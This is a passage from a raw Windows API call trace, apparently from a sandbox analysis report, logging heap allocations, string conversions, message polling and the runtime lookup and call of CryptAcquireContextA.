lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0255.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466d90, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0255.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0255.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0255.928] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0255.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0255.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0255.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466d90, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0255.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0255.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0255.928] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0255.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0255.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0255.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0255.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0255.929] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2698) returned 1 [0255.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0255.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0255.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0255.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0255.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0255.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0255.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0255.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0255.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0255.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0255.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0255.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0255.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0255.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0255.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0255.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0255.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0255.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0255.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0255.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0255.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0255.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0255.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0255.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0255.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0255.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0255.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0255.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0255.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0255.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0255.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0255.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0255.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0255.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0255.933] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0255.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0255.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0255.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0255.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.934] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.934] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0255.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0255.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0255.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c08 [0255.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0255.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0255.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0255.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0255.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0255.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0255.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0255.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0255.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0255.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0255.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c90 [0255.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0255.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0255.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0255.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0255.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0255.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0255.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0255.937] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0255.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0255.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0255.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0255.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0255.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0255.937] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0255.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0255.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0255.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0255.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0255.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0255.938] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0255.938] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0255.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0255.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0255.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0255.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0255.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0255.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0255.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.939] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0255.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0255.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0255.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0255.940] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.940] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.940] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0255.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0255.940] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0255.940] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0255.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0255.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0255.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0255.941] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0255.941] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.941] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0255.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0255.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0255.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0255.941] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.941] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.941] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0255.942] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0255.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0255.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0255.942] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0255.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0255.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0255.942] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0255.942] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0255.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0255.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0255.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0255.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.943] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0255.943] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.943] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0255.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0255.943] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0255.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0255.943] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0255.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0255.944] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0255.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0255.944] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0255.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0255.944] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0255.944] RtlAllocateHeap 